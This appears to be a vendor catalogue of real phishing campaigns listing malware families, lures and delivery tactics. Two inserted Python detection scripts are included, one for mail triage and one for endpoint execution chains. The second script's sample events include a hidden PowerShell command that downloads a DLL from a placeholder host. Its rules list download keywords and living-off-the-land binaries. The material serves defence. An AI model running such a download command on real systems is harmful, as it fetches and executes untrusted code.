
A phishing attack is an email crafted by a fraudster to trick the recipient into giving up sensitive information, such as corporate network credentials, or into authorizing a financial transaction. The majority of data breaches against businesses today begin with a phishing email.

Two well-known phishing examples:

The infamous Target breach of 2013 started with a phishing email to a third-party HVAC contractor; the stolen vendor credentials gave the attackers a foothold in Target's business systems for further attacks.
Spearphishing features prominently in the Mueller Report's account of the 2016 presidential election hacking.

Some quick phishing statistics:

Over 55% of organizations experienced at least one successful phish last year.
$12 billion is the 5-year global cost of just one type of phishing attack, business email compromise (BEC).
The average phishing attack costs a mid-sized business $3.86 million.

Our database has thousands of phishing examples, but most fit into one of these three categories:

Phishing Emails with Malicious Links: Sometimes a phishing attack is simply an email with an embedded link. Clicking it either fetches malware or lands on a page that imitates a legitimate login or form and is built to harvest whatever you type into it.

Phishing Attacks with Malicious Attachments: Attackers also send emails whose attachments carry malware, usually in file types people open without a second thought: Microsoft Word or Excel documents (typically with macros) or Adobe PDFs. The attack trades on the trust placed in everyday business tools.

Business Email Compromise (BEC): BEC emails, also called CEO fraud, usually carry no malware at all; they simply manipulate the target into sending money. The classic BEC attack asks someone in the finance department to authorize a wire transfer to a supposed "vendor" or "partner," and the message is often sent in the name of the CEO or CFO to pressure the recipient into acting quickly.
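The three categories above are exactly what a mail-triage script has to recognise before a message reaches a mailbox. The following is an added example, not code from the original page or its vendor: it parses one raw RFC 822 message with Python's standard library and flags the delivery tactics the entries below keep recording (embedded URLs, loader-type attachments, Office files that ship a VBA project, password-protected containers a gateway cannot open) together with the Reply-To mismatch typical of BEC. The addresses, file names, extension lists and the sample message are constructed assumptions.

```python
"""Mail triage for the delivery tactics this catalogue keeps recording.

Added example, not code from the original page. Given one raw RFC 822 message
it reports: embedded URLs, attachment types the entries use to carry loaders
(scripts, JNLP, HTM, archives), Office documents that ship a VBA project,
password-protected containers the gateway cannot inspect, and the Reply-To
mismatch typical of BEC. Addresses, file names and the extension lists are
assumptions for illustration.
"""
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
RISKY_EXT = {".js", ".jse", ".vbs", ".hta", ".jnlp", ".htm", ".html", ".lnk",
             ".exe", ".scr", ".rar", ".7z", ".zip", ".alz"}
OOXML_EXT = {".docx", ".docm", ".xlsx", ".xlsm", ".pptx", ".pptm"}
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file header


def _zip_info(data: bytes):
    """(entry names, any-entry-encrypted) for a ZIP container, else None."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            infos = zf.infolist()
            return [i.filename for i in infos], any(i.flag_bits & 0x1 for i in infos)
    except zipfile.BadZipFile:
        return None


def has_vba_project(data: bytes) -> bool:
    """OOXML is a ZIP; a macro project is stored as */vbaProject.bin."""
    info = _zip_info(data)
    return info is not None and any(n.lower().endswith("vbaproject.bin") for n in info[0])


def is_encrypted_archive(data: bytes) -> bool:
    """ZIP: general-purpose bit 0 marks encrypted entries. A password-saved Office
    file is an OLE2 container whose directory names an EncryptedPackage stream."""
    info = _zip_info(data)
    if info is not None:
        return info[1]
    return data.startswith(CFB_MAGIC) and "EncryptedPackage".encode("utf-16-le") in data


def _ext(name: str) -> str:
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def _domain(header: str) -> str:
    return parseaddr(header)[1].rpartition("@")[2].lower()


def triage(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    out = {"urls": [], "attachments": [], "flags": []}
    from_dom = _domain(str(msg.get("From", "")))
    reply_dom = _domain(str(msg.get("Reply-To", "")))
    if reply_dom and reply_dom != from_dom:  # BEC: replies leave the sender's domain
        out["flags"].append(f"reply-to domain {reply_dom} differs from sender {from_dom}")
    for part in msg.walk():
        name = part.get_filename()
        if name:
            data = part.get_payload(decode=True) or b""
            out["attachments"].append(name)
            if _ext(name) in RISKY_EXT:
                out["flags"].append(f"risky attachment type: {name}")
            if _ext(name) in OOXML_EXT and has_vba_project(data):
                out["flags"].append(f"macro-laden Office document: {name}")
            if is_encrypted_archive(data):
                out["flags"].append(f"password-protected container: {name}")
        elif part.get_content_type() in ("text/plain", "text/html"):
            out["urls"].extend(URL_RE.findall(part.get_content()))
    return out


def build_sample() -> bytes:
    """Constructed lure: finance theme, macro spreadsheet, 'password-protected'
    archive (the ZIP encryption flag is set by hand; no real crypto involved)."""
    xlsm = io.BytesIO()
    with zipfile.ZipFile(xlsm, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/vbaProject.bin", b"\x00" * 16)
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("invoice.doc", b"placeholder")
    buf = bytearray(archive.getvalue())
    buf[buf.find(b"PK\x01\x02") + 8] |= 0x01  # central directory flags: encrypted
    msg = EmailMessage()
    msg["From"] = "Jane Doe <jane.doe@example.com>"
    msg["Reply-To"] = "jane.doe@mail.example.net"
    msg["To"] = "ap@example.com"
    msg["Subject"] = "Payment due: invoice 4471"
    msg.set_content("Please process the attached invoice today.")
    msg.add_alternative('<a href="http://lure.example.invalid/inv">Open invoice</a>', subtype="html")
    msg.add_attachment(xlsm.getvalue(), maintype="application",
                       subtype="vnd.ms-excel.sheet.macroEnabled.12", filename="invoice.xlsm")
    msg.add_attachment(bytes(buf), maintype="application", subtype="zip", filename="docs.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(triage(build_sample()))
```

The macro check works on the container, not the file extension: a ZIP that carries `vbaProject.bin` is macro-enabled whatever it is named, which is why the script looks inside every OOXML attachment. The encrypted-container check is the counterpart to the "password protected" entries further down: when the gateway cannot open the archive, the fact that it is encrypted is itself the signal.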

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco IronPort, Proofpoint, and Symantec MessageLabs deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Symantec

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver a JavaScript file via an embedded URL. The JavaScript file unpacks and runs STRRAT.

ENVIRONMENTS: Proofpoint

TYPE: STRRAT

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver JNLP shortcut files via XXE archives. The JNLP files download and run a JAR Downloader which in turn downloads Smoke Loader.

ENVIRONMENTS: Proofpoint

TYPE: Smoke Loader

POSTED ON: 03/02/2021

TACTIC: downloader attachment

THEME: Finance
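Most entries on this page end the same way: a macro-laden spreadsheet or, as in the Smoke Loader record above, a JNLP file downloads and runs a loader. A gateway that let the mail through still leaves an execution trail on the endpoint. The following is an added example, not code from the original page or its vendor: it runs three rules over constructed process-creation events (the Sysmon Event ID 1 field names ParentImage, Image and CommandLine are an assumption) and returns the rule names each event matches.

```python
"""Execution-stage detection for the delivery chains recorded on this page:
an Office document whose macro hands off to a living-off-the-land binary, a
script host that pulls a second stage, and a JNLP file launched from a
user-writable path.

Added example, not code from the original page. Field names follow Sysmon
Event ID 1 (ParentImage, Image, CommandLine) by assumption; the events below
are constructed for the demonstration.
"""
import json

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
           "msiexec.exe", "bitsadmin.exe", "curl.exe"}
DOWNLOADERS = {"powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe", "curl.exe"}
DOWNLOAD_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                   "net.webclient", "start-bitstransfer", "-urlcache", "http://", "https://")
USER_PATHS = ("\\downloads\\", "\\temp\\", "\\appdata\\")


def _base(path: str) -> str:
    """File name of an image path, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Rule names matched by one process-creation event (empty list if none)."""
    parent = _base(event.get("ParentImage", ""))
    image = _base(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawns_lolbin")
    if image in DOWNLOADERS and any(t in cmd for t in DOWNLOAD_TOKENS):
        hits.append("lolbin_download")
    if image == "javaws.exe" and ".jnlp" in cmd and any(p in cmd for p in USER_PATHS):
        hits.append("jnlp_from_user_path")
    return hits


def scan(events_jsonl: str) -> list:
    """Run every rule over newline-delimited JSON events; return only the hits."""
    alerts = []
    for line in events_jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        rules = classify(ev)
        if rules:
            alerts.append({"ProcessId": ev.get("ProcessId"), "rules": rules})
    return alerts


# Constructed events: a macro-spreadsheet chain, a JNLP launch, and benign noise.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c powershell -w hidden -f C:\Users\u\AppData\Local\Temp\s.ps1"},
    {"ProcessId": 4128, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                    "'http://dl.example.invalid/a.dll','C:\\Users\\Public\\a.dll')"},
    {"ProcessId": 5010, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Java\jre1.8.0_281\bin\javaws.exe",
     "CommandLine": r'"C:\Program Files\Java\jre1.8.0_281\bin\javaws.exe" C:\Users\u\Downloads\Invoice.jnlp'},
    {"ProcessId": 5222, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"ProcessId": 5300, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\u\Documents\budget.xlsx'},
])

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The parent/child rule fires on the first hop only (Excel to cmd.exe); the download rule picks up the second hop on its own command line, so the two alerts together reconstruct the chain even when the events arrive out of order. The splwow64.exe event is included to show that an Office parent alone is not enough: the child has to be on the LOLBIN list.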

Real Phishing Example: Microsoft-spoofing emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance


Real Phishing Example: Xerox-spoofing emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco IronPort, Proofpoint, and Symantec MessageLabs deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365, Cisco Ironport, Proofpoint, and Symantec MessageLabs

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco IronPort, Proofpoint, and Symantec MessageLabs deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco IronPort, Proofpoint, and Symantec MessageLabs deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Cisco Ironport

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver JNLP shortcut files via XXE archives. The JNLP files download and run a JAR Downloader which in turn downloads Smoke Loader.

ENVIRONMENTS: Proofpoint

TYPE: Smoke Loader

POSTED ON: 03/01/2021

TACTIC: downloader attachment

THEME: Finance

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password-protected, macro-laden Office spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Proofpoint

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password-protected, macro-laden Office spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Cisco Ironport

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password-protected, macro-laden Office spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password-protected, macro-laden Office spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Mimecast

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link


Real Phishing Example: Fax-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Agent Tesla Keylogger

POSTED ON: 02/23/2021

TACTIC: Link


Real Phishing Example: Notification-themed emails found in environments protected by Microsoft Defender for O365 deliver credential phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phishing

POSTED ON: 02/23/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Microsoft Defender for O365 deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 02/22/2021

TACTIC: RAR Attachment


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Microsoft Defender for O365 deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Remcos RAT

POSTED ON: 02/22/2021

TACTIC: RAR Attachment


Real Phishing Example: Finance-themed emails found in environments protected by Microsoft Defender for O365 deliver credential phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phishing

POSTED ON: 02/19/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Mimecast, and Microsoft Defender for O365 deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: ZLoader

POSTED ON: 02/18/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Mimecast, and Microsoft Defender for O365 deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: ZLoader

POSTED ON: 02/18/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Mimecast, and Microsoft Defender for O365 deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Ironport

TYPE: ZLoader

POSTED ON: 02/18/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Mimecast, and Microsoft Defender for O365 deliver ZLoader via macro-laden Office spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: ZLoader

POSTED ON: 02/18/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and O365-ATP deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 02/09/2021

TACTIC: RAR Attachment


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and O365-ATP deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Remcos RAT

POSTED ON: 02/09/2021

TACTIC: RAR Attachment


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 02/01/2021

TACTIC: URL link embedded

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Microsoft ATP deliver credential phishing via a MailChimp Click Tracking URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 02/01/2021

TACTIC: URL link embedded


Real Phishing Example: DHL-spoofing emails found in environments protected by Proofpoint and Microsoft ATP deliver Agent Tesla keylogger via embedded links. The embedded links download a 7Z archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 02/01/2021

TACTIC: URL link embedded

THEME: Finance


Real Phishing Example: Document-themed emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/28/2021

TACTIC: URL link embedded

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver Quasar RAT via Office macros downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 01/28/2021

TACTIC: URL link embedded


Real Phishing Example: LAN Associates-spoofing emails found in environments protected by O365-ATP deliver credential phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL link embedded

THEME: Consumer Goods


Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP deliver credential phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL link embedded

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver ZLoader via malicious Office macros.

ENVIRONMENTS: Proofpoint

TYPE: ZLoader

POSTED ON: 01/22/2021

TACTIC: DOCM Attachment

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL Link embedded

THEME: Healthcare


Real Phishing Example: IRS-spoofing emails found in environments protected by Proofpoint and Microsoft ATP deliver credential phishing via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL link embedded

THEME: Real Estate


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Order-themed emails found in environments protected by Proofpoint and O365-ATP deliver TrickBot via macro-laden Office spreadsheets downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 01/21/2021

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Impots-spoofing emails found in environments protected by Proofpoint deliver Client Maximus banking trojan via an Advanced INF Installer which is downloaded from an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 01/20/2021

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Symantec deliver Agent Tesla keylogger via an embedded URL.

ENVIRONMENTS: Symantec

TYPE: Keylogger

POSTED ON: 01/15/2021

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. Note: This was in Spanish.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/15/2021

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/15/2021

TACTIC: URL link

THEME: Manufacturing


Real Phishing Example: Support-themed emails found in environments protected by Symantec deliver NetWire RAT hosted on Microsoft OneDrive. The hosted file is a RAR archive containing NetWire.

ENVIRONMENTS: Symantec

TYPE: NetWire

POSTED ON: 01/08/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office macros downloaded from embedded URLs. The macros download and run Dridex.

ENVIRONMENTS: Symantec

TYPE: Dridex

POSTED ON: 01/04/2021

TACTIC: Link


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver Ave_Maria stealer via embedded links. The embedded links download a macro-laden Office document that downloads an Ave_Maria executable.

ENVIRONMENTS: Proofpoint

TYPE: Ave_Maria Stealer

POSTED ON: 01/04/2021

TACTIC: Link


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/04/2021

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers; once an order number is entered, the site redirects to a payload URL that downloads a macro-laden Office document. The macro downloads and runs BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: BazarBackdoor

POSTED ON: 01/04/2021

TACTIC: PDF Attachment


Real Phishing Example: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers; once an order number is entered, the site redirects to a payload URL that downloads a macro-laden Office document. The macro downloads and runs BazarBackdoor.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BazarBackdoor

POSTED ON: 01/04/2021

TACTIC: PDF Attachment


Real Phishing Example: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers; once an order number is entered, the site redirects to a payload URL that downloads a macro-laden Office document. The macro downloads and runs BazarBackdoor.

ENVIRONMENTS: Symantec

TYPE: BazarBackdoor

POSTED ON: 01/04/2021

TACTIC: PDF Attachment


Real Phishing Example: Finance-themed emails found in environments protected by Symantec deliver attached XLS files. These files download and run Buer Loader.

ENVIRONMENTS: Symantec

TYPE: Buer Loader

POSTED ON: 01/04/2021

TACTIC: XLS Attachment


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office macros downloaded from embedded URLs. The macros download and run Dridex.

ENVIRONMENTS: Proofpoint

TYPE: Dridex

POSTED ON: 01/04/2021

TACTIC: Link


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office macros downloaded from embedded URLs. The macros download and run Dridex.

ENVIRONMENTS: Mimecast

TYPE: Dridex

POSTED ON: 01/04/2021

TACTIC: Link


Real Phishing Example: Finance- or response-themed emails found in environments protected by Proofpoint deliver macro-laden Office documents, either directly attached or inside attached password-protected archives. The documents download Emotet.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/29/2020

TACTIC: Attachment

THEME: Finance


Real Phishing Example: Staffing-update-themed emails found in environments protected by Proofpoint deliver TrickBot via attached macro-laden Office spreadsheets.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/28/2020

TACTIC: Attachment

THEME: Finance


Real Phishing Example: A finance-themed campaign found in environments protected by O365-ATP delivers PDF files hosted on Google Drive. The PDF files contain links that download archives containing scripts. The scripts act as a reconnaissance tool, holding an ongoing connection to a C2 server to exfiltrate information and download additional payloads.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 12/28/2020

TACTIC: Attachment

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Mimecast deliver Dridex via macro-laden Office documents downloaded from embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 12/28/2020

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Microsoft ATP deliver credential phishing via an attached HTM file.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: Attachment

THEME: Finance

Real Phishing Example: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Ransomware

POSTED ON: 12/18/2020

TACTIC: Attachment

THEME: Finance


Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance


Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver LuminosityLink RAT via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver LuminosityLink RAT via an embedded URL.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Cisco Ironport

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Mimecast

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Symantec

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro-laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an embedded OneDrive link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an embedded OneDrive link.

Real Phishing Example: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an embedded OneDrive link.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an embedded OneDrive link.

Real Phishing Example: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

ENVIRONMENTS: Proofpoint

TYPE: Ransomware

POSTED ON: 12/18/2020

TACTIC: Attachment

THEME: Finance

